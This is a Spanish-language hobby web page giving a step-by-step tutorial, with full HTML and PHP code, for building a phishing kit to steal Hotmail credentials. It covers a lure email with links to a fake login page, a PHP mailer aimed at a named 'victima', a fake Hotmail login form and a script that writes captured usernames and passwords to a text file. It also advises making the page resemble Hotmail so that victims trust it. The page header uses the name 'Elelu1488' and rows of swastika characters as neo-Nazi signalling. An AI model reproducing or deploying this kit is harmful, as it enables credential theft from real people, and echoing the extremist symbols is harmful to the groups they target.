Bienvenidos a mi pagina web:Elelu1488
   
  trucosyherramientaseducativas
Navegación
  Crear tu propio Xploit
 

Lanzador Casero De Exploit:


Archivos que hay que crear :

1-Exploit.html (Este es un codigo en HTML de lo que ustedes quieran ... en todos los enlaces que tenga este formulario , cuando la victima le de click debe ser redirigido a otra pagina)

2-Lanzador.php : este envia los datos a la victima.

3-login_fack.php : Este los guarda en un archivo de texto , y para los que tienen m?s experiencia en una base de datos MySql.

4-formulario.htm : Este es el que nos salta en cualquier lanzador de exploit que nos pide que pongamos nuestro mail y el de la victima para lanzar el exploit y en caso de caer sea enviado a nuestro mail.

5-login_fack.php : Este es a donde sera redireccionada la victima desp?es de recibir el exploit

6-falsear.php : Este es el archivo que procesa todos los datos despues que la victima los ingreso en "login_fack.php"

Código Exploit:::卐卐卐卐卐卐卐卐卐卐卐卐卐卐卐卐卐卐卐卐卐卐卐卐卐卐卐卐

<p><strong>Novedades de IPC-Soft </strong></p>
<table width="0" border="1" align="center" cellpadding="0" cellspacing="3">
<tr>
<td width="356">Nuevo Skin en la comunidad <a href="http://ipc-nuke.***/login_fack...">(Leer m&aacute;s...) </a></td>
<td width="360">Lanzadores v1.0 <a href="http://ipc-nuke.***/login_fack...">(Leer m&aacute;s...)</a> </td>
</tr>
<tr>
<td>MSN Messenger Fackerv2.0 <a href="http://ipc-nuke.***/login_fack...">(Leer m&aacute;s...)</a> </td>
<td>Cualquier cosa <a href="http://ipc-nuke.***/login_fack...">(Leer m&aacute;s...) </a></td>
</tr>
<tr>
<td>[by Hack-CBA]</td>
<td><a href="<A href='http://ipc-nuke.***/login_fack.php">http://ipc-soft.tkhttp://ipc-nuke.***/login_fack.php">http://ipc-soft.tk</a></td>
</tr>
</table>

==================================================

Notaran que en cada (Leer más ...) nos lleva a una pagina llamada :: <A href="http://ipc-nuke.***/login_fack.php">http://ipc-nuke.***/login_fack.php ::
obiamente esta es la pagina donde se produce un pedido a la victima que coloque su login y pass de hotmail.

Código:
======================Lanzador.php================ ====
<?
$html="
AQUI el code de arriba (Exploit en HTML)
";
mail($victima,"Novedades IPC-Soft",$html);
echo "El exploit fu? enviado con exito";
?>
================================================== ==

Explico un poco , aqui lo que hacemos es crear una variable "$html" donde indicamos el contenido, seria el mensaje .
mail(Aquien lo enviamos, asunto , cuerpo del mensaje);
echo "Mensaje que todo esta bien";
?> cerramos php

Ahora hay que crear el formulario del lanzador, es decir, el que comunmente dice
Victima | @hotmail.com|
Tu mail | @hotmail.com |

aqui no vamos a poner ningun "Tu mail" porque en lugar de eso , crearemos un archivo de texto que nos mostrar? los users y passwordws introducidos.

Código:
============formulario.ht
m========
<form name="form1" method="post" action="lanzador.php">
<table width="0" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>Victima</td>
<td><input name="victima" type="text" id="victima" value="@hotmail.com"></td>
</tr>
<tr>
<td>&nbsp;</td>
<td><input type="submit" name="Submit" value="Enviar"></td>
</tr>
</table>
</form>
<p></p>
====================================

aqui simplemente notaran que die "victima" type...
al enviar el formulario a "lanzador.php" , este interpreta a "victima" como $victima y es el correo a quien sera enviado el e-mail con un mensaje HTML

ok, ya esta casi todo listo. Solo nos queda hacer el "login_fack.php" donde se guardaran los passwords retenidos.
Hay que crear un formulario ... estilo la pagina principal de <A href="http://www.hotmail.com">www.hotmail.com
para que sea m?s creible.(Eso queda a su criterio , no el mio).

Código:

=============login_fack.php===================

<form name="form1" method="post" action="falsear.php">
<table width="0" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>Login</td>
<td><input name="login" type="text" id="login"></td>
</tr>
<tr>
<td>Password</td>
<td><input name="pass" type="password" id="pass" value=""></td>
</tr>
<tr>
<td>&nbsp;</td>
<td><input type="submit" name="Submit" value="Enviar"></td>
</tr>
</table>
</form>
<p>&nbsp;</p>
=============================================

Aqui vemos varias cosas interesantes: falsear.php , login , pass
bueno falsear.php es la pagina que nos va a procesar todo y guardar el password
login y pass , serian
$login
$pass

ahora que sabemos esto vamos a terminar el "lanzador"
...
Creamos otra pagina php

Código:

================falsear.php====================
<?php
$archivo='pass_fack.txt';
$login=$_POST[login];
$pass=$_POST[pass];

$hcba=fopen($archivo,'a');
fwrite($hcba,$login.$pass);
echo "datos correctamente introducidos";
?>
==================================================

bueno , más simple imposible...
$archivo , tienen que colocar el nombre y extenci?n del archivo de texto que va a guardar los datos

?Que datos guarda?

$login & $pass
Los escribe con el metodo $_post .
// $hcba=fopen($archivo,'a');
Aqui indicamos que $hcba es = a abrir el archivo en modo "a" que seria ir agregando contenido sin borrar otro.
y luego indicamos que escriba en $hcba el $login y el $pass.
 


  
  Total: 42945 visitantes (67226 clics a subpáginas) ¡Aqui en esta página!  
Facebook botón-like
 
Este sitio web fue creado de forma gratuita con PaginaWebGratis.es. ¿Quieres también tu sitio web propio?
Registrarse gratis